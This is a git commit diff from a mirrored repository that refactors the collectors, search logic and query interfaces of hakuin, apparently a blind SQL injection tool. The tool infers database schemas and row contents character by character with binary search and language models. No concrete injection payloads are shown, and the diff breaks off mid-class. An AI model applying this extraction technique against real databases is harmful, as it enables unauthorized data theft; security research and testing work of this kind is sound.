mirror of https://github.com/pruzko/hakuin synced 2024-10-18 09:48:06 +02:00

major refactoring (DBMS, collectors) & unicode support

Jakub Pruzinec 2023-10-04 19:13:22 +08:00
parent 042fa5df91
commit 9932d8dacd
17 changed files with 1214 additions and 622 deletions

.gitignore (vendored)

@@ -162,4 +162,5 @@ cython_debug/
 #.idea/
 
 # Hakuin
 tmp/
+demos/

@@ -1,7 +1,6 @@
 import hakuin
 import hakuin.search_algorithms as search_alg
 import hakuin.collectors as collect
-from hakuin.utils import CHARSET_SCHEMA
@@ -33,24 +32,23 @@ class Extractor:
         ctx = search_alg.Context(None, None, None, None)
 
-        n_rows = search_alg.IntExponentialSearch(
-            self.requester,
-            self.dbms.count_tables,
-            upper=8
+        n_rows = search_alg.IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.dbms.TablesQueries.rows_count,
+            upper=8,
+            find_range=True,
         ).run(ctx)
 
         if strategy == 'binary':
             return collect.BinaryTextCollector(
-                self.requester,
-                self.dbms.char_tables,
-                charset=CHARSET_SCHEMA,
+                requester=self.requester,
+                queries=self.dbms.TablesQueries,
             ).run(ctx, n_rows)
         else:
             return collect.ModelTextCollector(
-                self.requester,
-                self.dbms.char_tables,
+                requester=self.requester,
+                queries=self.dbms.TablesQueries,
                 model=hakuin.get_model_tables(),
-                charset=CHARSET_SCHEMA,
             ).run(ctx, n_rows)
@@ -70,24 +68,23 @@ class Extractor:
         ctx = search_alg.Context(table, None, None, None)
 
-        n_rows = search_alg.IntExponentialSearch(
-            self.requester,
-            self.dbms.count_columns,
-            upper=8
+        n_rows = search_alg.IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.dbms.ColumnsQueries.rows_count,
+            upper=8,
+            find_range=True,
         ).run(ctx)
 
         if strategy == 'binary':
             return collect.BinaryTextCollector(
-                self.requester,
-                self.dbms.char_columns,
-                charset=CHARSET_SCHEMA,
+                requester=self.requester,
+                queries=self.dbms.ColumnsQueries,
             ).run(ctx, n_rows)
         else:
             return collect.ModelTextCollector(
-                self.requester,
-                self.dbms.char_columns,
+                requester=self.requester,
+                queries=self.dbms.ColumnsQueries,
                 model=hakuin.get_model_columns(),
-                charset=CHARSET_SCHEMA,
             ).run(ctx, n_rows)
@@ -104,15 +101,15 @@ class Extractor:
         ctx = search_alg.Context(table, column, None, None)
 
         d_type = search_alg.BinarySearch(
-            self.requester,
-            self.dbms.meta_type,
+            requester=self.requester,
+            query_cb=self.dbms.MetaQueries.column_data_type,
             values=self.dbms.DATA_TYPES,
         ).run(ctx)
 
         return {
             'type': d_type,
-            'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)),
-            'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)),
+            'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
+            'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
         }
@@ -140,7 +137,7 @@ class Extractor:
         return schema
 
-    def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128):
+    def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
         '''Extracts text column.
 
         Params:
@@ -152,7 +149,6 @@ class Extractor:
                 'dynamic' for dynamically choosing the best search strategy and
                 opportunistically guessing strings
             charset (list|None): list of possible characters
-            n_rows (int|None): number of rows
             n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
 
         Returns:
@@ -162,32 +158,30 @@ class Extractor:
         assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
         ctx = search_alg.Context(table, column, None, None)
 
-        if n_rows is None:
-            n_rows = search_alg.IntExponentialSearch(
-                self.requester,
-                self.dbms.count_rows,
-                upper=n_rows_guess
-            ).run(ctx)
+        n_rows = search_alg.IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.dbms.RowsQueries.rows_count,
+            upper=n_rows_guess,
+            find_range=True,
+        ).run(ctx)
 
         if strategy == 'binary':
             return collect.BinaryTextCollector(
-                self.requester,
-                self.dbms.char_rows,
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
                 charset=charset,
             ).run(ctx, n_rows)
         elif strategy in ['unigram', 'fivegram']:
             ngram = 1 if strategy == 'unigram' else 5
             return collect.AdaptiveTextCollector(
-                self.requester,
-                self.dbms.char_rows,
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
                 model=hakuin.Model(ngram),
                 charset=charset,
             ).run(ctx, n_rows)
         else:
             return collect.DynamicTextCollector(
-                self.requester,
-                self.dbms.char_rows,
-                self.dbms.string_rows,
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
                 charset=charset,
             ).run(ctx, n_rows)
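
Note on the extract_column change above: the n_rows parameter is gone, so the row count is always inferred and n_rows_guess only seeds the exponential phase. A standalone sketch of the resulting query cost, with illustrative numbers that are not part of the commit:

    # A 1000-row table probed with n_rows_guess=128: "count(*) < n" is asked at
    # n = 128, 256, 512, 1024 (4 queries to find the range [512, 1024)), then a
    # binary search over the 512-wide range adds log2(512) = 9 more queries.
    from math import log2
    uppers = [128 * 2 ** i for i in range(4)]
    print(uppers, int(log2(1024 - 512)))    # [128, 256, 512, 1024] 9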

@@ -26,8 +26,9 @@ class Model:
     @property
     def order(self):
-        assert self.model
-        return self.model.order
+        if self.model:
+            return self.model.order
+        return None
 
     def load(self, file):
@@ -49,7 +50,7 @@ class Model:
         Returns:
             dict: likelihood distribution
         '''
-        context = context[-(self.order - 1):]
+        context = [] if self.order == 1 else context[-(self.order - 1):]
 
         while context:
             scores = self._scores(context)
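
The order-1 guard added to scores() works around a Python slicing edge case; a minimal standalone illustration, not part of the commit:

    # For a unigram model, order - 1 == 0, and context[-0:] is the same as
    # context[0:]: the WHOLE list rather than the empty context a unigram needs.
    context = ['h', 'e', 'l']
    print(context[-0:])                                   # ['h', 'e', 'l']
    order = 1
    print([] if order == 1 else context[-(order - 1):])   # []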

@@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod
 from collections import Counter
 
 import hakuin
-from hakuin.utils import tokenize, CHARSET_ASCII, EOS
+from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
 from hakuin.utils.huffman import make_tree
-from hakuin.search_algorithms import Context, BinarySearch, TreeSearch
+from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
 
 
 class Collector(metaclass=ABCMeta):
-    '''Abstract class for collectors. Collectors repeatidly run
-    search algorithms to infer column rows.
+    '''Abstract class for collectors. Collectors repeatedly run
+    search algorithms to extract column rows.
     '''
-    def __init__(self, requester, query_cb):
+    def __init__(self, requester, queries):
         '''Constructor.
 
         Params:
             requester (Requester): Requester instance
-            query_cb (function): query construction function
+            queries (UniformQueries): injection queries
         '''
         self.requester = requester
-        self.query_cb = query_cb
+        self.queries = queries
 
-    def run(self, ctx, n_rows):
-        '''Run collection.
+    def run(self, ctx, n_rows, *args, **kwargs):
+        '''Collects the whole column.
 
         Params:
-            ctx (Context): inference context
+            ctx (Context): extraction context
             n_rows (int): number of rows in column
 
         Returns:
             list: column rows
         '''
-        logging.info(f'Inferring "{ctx.table}.{ctx.column}"...')
+        logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
         data = []
         for row in range(n_rows):
             ctx = Context(ctx.table, ctx.column, row, None)
-            res = self._collect_row(ctx)
+            res = self.collect_row(ctx, *args, **kwargs)
             data.append(res)
-            logging.info(f'({row + 1}/{n_rows}) inferred: {res}')
+            logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}')
 
         return data
 
     @abstractmethod
-    def _collect_row(self, ctx):
+    def collect_row(self, ctx, *args, **kwargs):
+        '''Collects a row.
+
+        Params:
+            ctx (Context): extraction context
+
+        Returns:
+            value: single row
+        '''
         raise NotImplementedError()
 
 
 class TextCollector(Collector):
     '''Collector for text columns.'''
-    def _collect_row(self, ctx):
+    def __init__(self, requester, queries, charset=None):
+        '''Constructor.
+
+        Params:
+            requester (Requester): Requester instance
+            queries (UniformQueries): injection queries
+            charset (list|None): list of possible characters, None for default ASCII
+        '''
+        super().__init__(requester, queries)
+        self.charset = charset if charset is not None else CHARSET_ASCII
+        if EOS not in self.charset:
+            self.charset.append(EOS)
+
+    def run(self, ctx, n_rows):
+        '''Collects the whole column.
+
+        Params:
+            ctx (Context): extraction context
+            n_rows (int): number of rows in column
+
+        Returns:
+            list: column rows
+        '''
+        rows_are_ascii = self.check_rows_are_ascii(ctx)
+        return super().run(ctx, n_rows, rows_are_ascii)
+
+    def collect_row(self, ctx, rows_are_ascii):
+        '''Collects a row.
+
+        Params:
+            ctx (Context): extraction context
+            rows_are_ascii (bool): ASCII flag for all rows in column
+
+        Returns:
+            string: single row
+        '''
+        row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
+
         ctx.s = ''
         while True:
-            c = self._collect_char(ctx)
+            c = self.collect_char(ctx, row_is_ascii)
             if c == EOS:
                 return ctx.s
             ctx.s += c
 
     @abstractmethod
-    def _collect_char(self, ctx):
+    def collect_char(self, ctx, row_is_ascii):
+        '''Collects a character.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+
+        Returns:
+            string: single character
+        '''
         raise NotImplementedError()
 
+    def check_rows_are_ascii(self, ctx):
+        '''Finds out whether all rows in column are ASCII.
+
+        Params:
+            ctx (Context): extraction context
+
+        Returns:
+            bool: ASCII flag
+        '''
+        query = self.queries.rows_are_ascii(ctx)
+        return self.requester.request(ctx, query)
+
+    def check_row_is_ascii(self, ctx):
+        '''Finds out whether current row is ASCII.
+
+        Params:
+            ctx (Context): extraction context
+
+        Returns:
+            bool: ASCII flag
+        '''
+        query = self.queries.row_is_ascii(ctx)
+        return self.requester.request(ctx, query)
+
+    def check_char_is_ascii(self, ctx):
+        '''Finds out whether current character is ASCII.
+
+        Params:
+            ctx (Context): extraction context
+
+        Returns:
+            bool: ASCII flag
+        '''
+        query = self.queries.char_is_ascii(ctx)
+        return self.requester.request(ctx, query)
 
 
 class BinaryTextCollector(TextCollector):
     '''Binary search text collector'''
-    def __init__(self, requester, query_cb, charset=None):
-        '''Constructor.
-
-        Params:
-            requester (Requester): Requester instance
-            query_cb (function): query construction function
-            charset (list|None): list of possible characters
-
-        Returns:
-            list: column rows
-        '''
-        super().__init__(requester, query_cb)
-        self.charset = charset if charset else CHARSET_ASCII
-
-    def _collect_char(self, ctx):
-        return BinarySearch(
-            self.requester,
-            self.query_cb,
-            values=self.charset,
-        ).run(ctx)
+    def collect_char(self, ctx, row_is_ascii):
+        '''Collects a character.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+
+        Returns:
+            string: single character
+        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
+
+    def emulate_char(self, ctx, row_is_ascii, correct):
+        '''Emulates character collection without sending requests.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+            correct (str): correct character
+
+        Returns:
+            int: number of requests necessary
+        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
+
+    def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
+        total_queries = 0
+
+        # custom charset or ASCII
+        if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
+            search_alg = BinarySearch(
+                requester=self.requester,
+                query_cb=self.queries.char,
+                values=self.charset,
+                correct=correct,
+            )
+            res = search_alg.run(ctx)
+            total_queries += search_alg.n_queries
+
+            if res is not None:
+                return res, total_queries
+
+        # Unicode
+        correct_ord = ord(correct) if correct is not None else correct
+        search_alg = IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.queries.char_unicode,
+            lower=ASCII_MAX + 1,
+            upper=UNICODE_MAX + 1,
+            find_range=False,
+            correct=correct_ord,
+        )
+        res = search_alg.run(ctx)
+        total_queries += search_alg.n_queries
+
+        return chr(res), total_queries
+
+    def _check_or_emulate_char_is_ascii(self, ctx, correct):
+        if correct is None:
+            return self.check_char_is_ascii(ctx)
+        return correct.isascii()
 
 
 class ModelTextCollector(TextCollector):
     '''Language model-based text collector.'''
-    def __init__(self, requester, query_cb, model, charset=None):
+    def __init__(self, requester, queries, model, charset=None):
         '''Constructor.
 
         Params:
             requester (Requester): Requester instance
-            query_cb (function): query construction function
+            queries (UniformQueries): injection queries
             model (Model): language model
             charset (list|None): list of possible characters
 
         Returns:
             list: column rows
         '''
-        super().__init__(requester, query_cb)
+        super().__init__(requester, queries, charset)
         self.model = model
-        self.charset = charset if charset else CHARSET_ASCII
+        self.binary_collector = BinaryTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            charset=self.charset,
+        )
 
-    def _collect_char(self, ctx):
+    def collect_char(self, ctx, row_is_ascii):
+        '''Collects a character.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+
+        Returns:
+            string: single character
+        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
+
+    def emulate_char(self, ctx, row_is_ascii, correct):
+        '''Emulates character collection without sending requests.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+            correct (str): correct character
+
+        Returns:
+            int: number of requests necessary
+        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
+
+    def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
+        n_queries_model = 0
+
         model_ctx = tokenize(ctx.s, add_eos=False)
         scores = self.model.scores(context=model_ctx)
-        c = TreeSearch(
-            self.requester,
-            self.query_cb,
-            tree=make_tree(scores),
-        ).run(ctx)
+        search_alg = TreeSearch(
+            requester=self.requester,
+            query_cb=self.queries.char,
+            tree=make_tree(scores),
+            correct=correct,
+        )
+        res = search_alg.run(ctx)
+        n_queries_model = search_alg.n_queries
 
-        if c is not None:
-            return c
+        if res is not None:
+            return res, n_queries_model
 
-        charset = list(set(self.charset).difference(set(scores)))
-        return BinarySearch(
-            self.requester,
-            self.query_cb,
-            values=self.charset,
-        ).run(ctx)
+        res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
+        return res, n_queries_model + n_queries_binary
 
 
 class AdaptiveTextCollector(ModelTextCollector):
     '''Same as ModelTextCollector but adapts the model.'''
-    def _collect_char(self, ctx):
-        c = super()._collect_char(ctx)
+    def collect_char(self, ctx, row_is_ascii):
+        c = super().collect_char(ctx, row_is_ascii)
         self.model.fit_correct_char(c, partial_str=ctx.s)
         return c
 
 
+class DynamicTextStats:
+    '''Helper class of DynamicTextCollector to keep track of statistical information.'''
+    def __init__(self):
+        self.str_len_mean = 0.0
+        self.n_strings = 0
+        self._rpc = {
+            'binary': {'mean': 0.0, 'hist': []},
+            'unigram': {'mean': 0.0, 'hist': []},
+            'fivegram': {'mean': 0.0, 'hist': []},
+        }
+
+    def update_str(self, s):
+        self.n_strings += 1
+        self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings
+
+    def update_rpc(self, strategy, n_queries):
+        rpc = self._rpc[strategy]
+        rpc['hist'].append(n_queries)
+        rpc['hist'] = rpc['hist'][-100:]
+        rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])
+
+    def rpc(self, strategy):
+        return self._rpc[strategy]['mean']
+
+    def best_strategy(self):
+        return min(self._rpc, key=lambda strategy: self.rpc(strategy))
+
+
 class DynamicTextCollector(TextCollector):
     '''Dynamic text collector. The collector keeps statistical information (RPC)
     for several strategies (binary search, unigram, and five-gram) and dynamically
     chooses the best one. In addition, it uses the statistical information to
     identify when guessing whole strings is likely to succeed and then uses
     previously inferred strings to make the guesses.
+    '''
+    def __init__(self, requester, queries, charset=None):
+        '''Constructor.
 
-    Attributes:
-        GUESS_TH (float): success probability threshold necessary to make guesses
-        GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree
-    '''
-    GUESS_TH = 0.5
-    GUESS_SCORE_TH = 0.01
-
-    def __init__(self, requester, query_char_cb, query_string_cb, charset=None):
-        '''Constructor.
-
-        Params:
-            requester (Requester): Requester instance
-            query_char_cb (function): query construction function for searching characters
-            query_string_cb (function): query construction function for searching strings
-            charset (list|None): list of possible characters
-
-        Other Attributes:
-            model_guess: adaptive string-based model for guessing
-            model_unigram: adaptive unigram model
-            model_fivegram: adaptive five-gram model
-        '''
-        self.requester = requester
-        self.query_char_cb = query_char_cb
-        self.query_string_cb = query_string_cb
-        self.charset = charset if charset else CHARSET_ASCII
-        self.model_guess = hakuin.Model(1)
-        self.model_unigram = hakuin.Model(1)
-        self.model_fivegram = hakuin.Model(5)
-        self._stats = {
-            'rpc': {
-                'binary': {'avg': 0.0, 'hist': []},
-                'unigram': {'avg': 0.0, 'hist': []},
-                'fivegram': {'avg': 0.0, 'hist': []},
-            },
-            'avg_len': 0.0,
-            'n_strings': 0,
-        }
-
-    def _collect_row(self, ctx):
-        s = self._collect_string(ctx)
-        self.model_guess.fit_single(s, context=[])
-        self._stats['n_strings'] += 1
-
-        total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s)
-        self._stats['avg_len'] = total / self._stats['n_strings']
-        return s
-
-    def _collect_string(self, ctx):
-        '''Identifies if guessings strings is likely to succeed and if yes, it makes guesses.
-        If guessing does not take place or fails, it proceeds with per-character inference.
-        '''
-        correct_str = self._try_guessing(ctx)
-
-        if correct_str is not None:
-            self._update_stats_str(ctx, correct_str)
-            self.model_unigram.fit_data([correct_str])
-            self.model_fivegram.fit_data([correct_str])
-            return correct_str
-
-        ctx.s = ''
-        while True:
-            c = self._collect_char(ctx)
-            self._update_stats(ctx, c)
-            self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
-            self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
-            if c == EOS:
-                return ctx.s
-            ctx.s += c
-
-    def _collect_char(self, ctx):
-        '''Chooses the best strategy and uses it to infer a character.'''
-        searched_space = set()
-        c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
-        if c is None:
-            c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
-        return c
-
-    def _try_guessing(self, ctx):
-        '''Tries to construct a guessing Huffman tree and searches it in case of success.'''
-        tree = self._get_guess_tree(ctx)
-        return TreeSearch(
-            self.requester,
-            self.query_string_cb,
-            tree=tree,
-        ).run(ctx)
+        Params:
+            requester (Requester): Requester instance
+            queries (UniformQueries): injection queries
+            charset (list|None): list of possible characters
+
+        Other Attributes:
+            model_unigram (Model): adaptive unigram model
+            model_fivegram (Model): adaptive five-gram model
+            guess_collector (StringGuessCollector): collector for guessing
+        '''
+        super().__init__(requester, queries, charset)
+        self.binary_collector = BinaryTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            charset=self.charset,
+        )
+        self.unigram_collector = ModelTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            model=hakuin.Model(1),
+            charset=self.charset,
+        )
+        self.fivegram_collector = ModelTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            model=hakuin.Model(5),
+            charset=self.charset,
+        )
+        self.guess_collector = StringGuessingCollector(
+            requester=self.requester,
+            queries=self.queries,
+        )
+        self.stats = DynamicTextStats()
+
+    def collect_row(self, ctx, rows_are_ascii):
+        row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
+
+        s = self._collect_string(ctx, row_is_ascii)
+        self.guess_collector.model.fit_single(s, context=[])
+        self.stats.update_str(s)
+        return s
+
+    def _collect_string(self, ctx, row_is_ascii):
+        '''Tries to guess strings or extracts them on per-character basis if guessing fails'''
+        exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
+        correct_str = self.guess_collector.collect_row(ctx, exp_c)
+
+        if correct_str is not None:
+            self._update_stats_str(ctx, row_is_ascii, correct_str)
+            self.unigram_collector.model.fit_data([correct_str])
+            self.fivegram_collector.model.fit_data([correct_str])
+            return correct_str
+
+        return self._collect_string_per_char(ctx, row_is_ascii)
+
+    def _collect_string_per_char(self, ctx, row_is_ascii):
+        ctx.s = ''
+        while True:
+            c = self.collect_char(ctx, row_is_ascii)
+            self._update_stats(ctx, row_is_ascii, c)
+            self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
+            self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)
+            if c == EOS:
+                return ctx.s
+            ctx.s += c
+        return ctx.s
+
+    def collect_char(self, ctx, row_is_ascii):
+        '''Chooses the best strategy and uses it to infer a character.'''
+        best = self.stats.best_strategy()
+        # print(f'b: {self.stats.rpc("binary")}, u: {self.stats.rpc("unigram")}, f: {self.stats.rpc("fivegram")}')
+        if best == 'binary':
+            return self.binary_collector.collect_char(ctx, row_is_ascii)
+        elif best == 'unigram':
+            return self.unigram_collector.collect_char(ctx, row_is_ascii)
+        else:
+            return self.fivegram_collector.collect_char(ctx, row_is_ascii)
+
+    def _update_stats(self, ctx, row_is_ascii, correct):
+        '''Emulates all strategies without sending requests and updates the statistical information.'''
+        collectors = (
+            ('binary', self.binary_collector),
+            ('unigram', self.unigram_collector),
+            ('fivegram', self.fivegram_collector),
+        )
+        for strategy, collector in collectors:
+            n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
+            self.stats.update_rpc(strategy, n_queries)
+
+    def _update_stats_str(self, ctx, row_is_ascii, correct_str):
+        '''Like _update_stats but for whole strings.'''
+        ctx.s = ''
+        for c in correct_str:
+            self._update_stats(ctx, row_is_ascii, c)
+            ctx.s += c
+
+
+class StringGuessingCollector(Collector):
+    '''String guessing collector. The collector keeps track of previously extracted
+    strings and opportunistically tries to guess new strings.
+    '''
+    GUESS_TH = 0.5
+    GUESS_SCORE_TH = 0.01
+
+    def __init__(self, requester, queries):
+        '''Constructor.
+
+        Params:
+            requester (Requester): Requester instance
+            queries (UniformQueries): injection queries
+
+        Other Attributes:
+            GUESS_TH (float): minimal threshold necessary to start guessing
+            GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing
+            model (Model): adaptive string-based model for guessing
+        '''
+        super().__init__(requester, queries)
+        self.model = hakuin.Model(1)
+
+    def collect_row(self, ctx, exp_alt=None):
+        '''Tries to construct a guessing Huffman tree and searches it in case of success.
+
+        Params:
+            ctx (Context): extraction context
+            exp_alt (float|None): expectation for alternative extraction method or None if it does not exist
+
+        Returns:
+            string|None: guessed string or None if skipped or failed
+        '''
+        exp_alt = exp_alt if exp_alt is not None else float('inf')
+        tree = self._get_guess_tree(ctx, exp_alt)
+        return TreeSearch(
+            requester=self.requester,
+            query_cb=self.queries.string,
+            tree=tree,
+        ).run(ctx)
 
-    def _get_guess_tree(self, ctx):
-        '''Identifies, whether string guessing is likely to succeed and if so,
+    def _get_guess_tree(self, ctx, exp_alt):
+        '''Identifies whether string guessing is likely to succeed and if so,
         it constructs a Huffman tree from previously inferred strings.
 
+        Params:
+            ctx (Context): extraction context
+            exp_alt (float): expectation for alternative extraction method
+
         Returns:
-            utils.huffman.Node|None: Huffman tree constructed from previously inferred
-            strings that are likely to succeed or None if no such strings were found
+            utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
+            likely to succeed or None if no such strings were found
         '''
-        # Expectation for per-character inference:
-        # exp_c = avg_len * best_strategy_rpc
-        exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
-
         # Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
         # strings into a candidate guess set "guesses" and computing their expectation "exp_g".
         # The iteration stops when the minimal "exp_g" is found.
-        # exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c)
+        # exp(G) = p(s in G) * exp_huff(G) + (1 - p(s in G)) * (exp_huff(G) + exp_alt)
         guesses = {}
         prob_g = 0.0
         best_prob_g = 0.0
         best_exp_g = float('inf')
         best_tree = None
 
-        scores = self.model_guess.scores(context=[])
-        scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1}
+        scores = self.model.scores(context=[])
+        scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
         for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
             guesses[guess] = score
             tree = make_tree(guesses)
             tree_cost = tree.search_cost()
             prob_g += score
-            exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c)
+            exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
 
             if exp_g > best_exp_g:
                 break
@@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
             best_exp_g = exp_g
             best_tree = tree
 
-        if best_exp_g > exp_c or best_prob_g < self.GUESS_TH:
-            return None
-        return best_tree
-
-    def _best_strategy(self):
-        '''Returns the name of the best strategy.'''
-        return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
-
-    def _update_stats(self, ctx, correct):
-        '''Emulates all strategies without sending any requests and updates the
-        statistical information.
-        '''
-        for strategy in self._stats['rpc']:
-            searched_space = set()
-            search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
-            res = search_alg.run(ctx)
-            n_queries = search_alg.n_queries
-
-            if res is None:
-                binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
-                binary_search.run(ctx)
-                n_queries += binary_search.n_queries
-
-            m = self._stats['rpc'][strategy]
-            m['hist'].append(n_queries)
-            m['hist'] = m['hist'][-100:]
-            m['avg'] = sum(m['hist']) / len(m['hist'])
-
-    def _update_stats_str(self, ctx, correct_str):
-        '''Like _update_stats but for whole strings'''
-        ctx.s = ''
-        for c in correct_str:
-            self._update_stats(ctx, c)
-            ctx.s += c
-
-    def _get_strategy(self, ctx, searched_space, strategy, correct=None):
-        '''Builds search algorithm configured to search appropriate space.
-
-        Params:
-            ctx (Context): inference context
-            searched_space (list): list of values that have already been searched
-            strategy (str): strategy ('binary', 'unigram', 'fivegram')
-            correct (str|None): correct character
-
-        Returns:
-            SearchAlgorithm: configured search algorithm
-        '''
-        if strategy == 'binary':
-            charset = list(set(self.charset).difference(searched_space))
-            return BinarySearch(
-                self.requester,
-                self.query_char_cb,
-                values=self.charset,
-                correct=correct,
-            )
-        elif strategy == 'unigram':
-            scores = self.model_unigram.scores(context=[])
-            searched_space.union(set(scores))
-            return TreeSearch(
-                self.requester,
-                self.query_char_cb,
-                tree=make_tree(scores),
-                correct=correct,
-            )
-        else:
-            model_ctx = tokenize(ctx.s, add_eos=False)
-            model_ctx = model_ctx[-(self.model_fivegram.order - 1):]
-            scores = self.model_fivegram.scores(context=model_ctx)
-            searched_space.union(set(scores))
-            return TreeSearch(
-                self.requester,
-                self.query_char_cb,
-                tree=make_tree(scores),
-                correct=correct,
-            )
+        if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
+            return best_tree
+        return None
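
Two details of the new dynamic collector are easy to check standalone (both snippets assume only the classes defined in this commit; the numbers are illustrative):

    # RPC ("requests per char") is a moving average over the last 100 samples.
    stats = DynamicTextStats()
    stats.update_rpc('binary', 4)
    stats.update_rpc('binary', 6)
    print(stats.rpc('binary'))      # 5.0
    print(stats.best_strategy())    # 'unigram': untried strategies keep their initial 0.0 mean

    # The guess expectation used by _get_guess_tree:
    # exp(G) = p(s in G) * exp_huff(G) + (1 - p(s in G)) * (exp_huff(G) + exp_alt)
    prob_g, tree_cost, exp_alt = 0.6, 2, 10
    exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
    print(exp_g)                    # 6.0 < exp_alt, so the guess tree would be searched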

@@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod
 
-class DBMS(metaclass=ABCMeta):
-    RE_NORM = re.compile(r'[ \n]+')
-
-    DATA_TYPES = []
+class Queries(metaclass=ABCMeta):
+    '''Class for constructing SQL queries.'''
+    _RE_NORMALIZE = re.compile(r'[ \n]+')
 
     @staticmethod
     def normalize(s):
-        return DBMS.RE_NORM.sub(' ', s).strip()
+        return Queries._RE_NORMALIZE.sub(' ', s).strip()
 
-    @abstractmethod
-    def count_rows(self, ctx, n):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def count_tables(self, ctx, n):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def count_columns(self, ctx, n):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def meta_type(self, ctx, values):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def meta_is_nullable(self, ctx):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def meta_is_pk(self, ctx):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def char_rows(self, ctx, values):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def char_tables(self, ctx, values):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def char_columns(self, ctx, values):
-        raise NotImplementedError()
-
-    @abstractmethod
-    def string_rows(self, ctx, values):
-        raise NotImplementedError()
+    @staticmethod
+    def hex(s):
+        return s.encode("utf-8").hex()
+
+
+class MetaQueries(Queries):
+    '''Interface for queries that infer DB metadata.'''
+    @abstractmethod
+    def column_data_type(self, ctx, values): raise NotImplementedError()
+
+    @abstractmethod
+    def column_is_nullable(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
+    def column_is_pk(self, ctx): raise NotImplementedError()
+
+
+class UniformQueries(Queries):
+    '''Interface for queries that can be unified.'''
+    @abstractmethod
+    def rows_count(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
+    def rows_are_ascii(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
+    def row_is_ascii(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
+    def char_is_ascii(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
+    def char(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
+    def char_unicode(self, ctx): raise NotImplementedError()
+
+    @abstractmethod
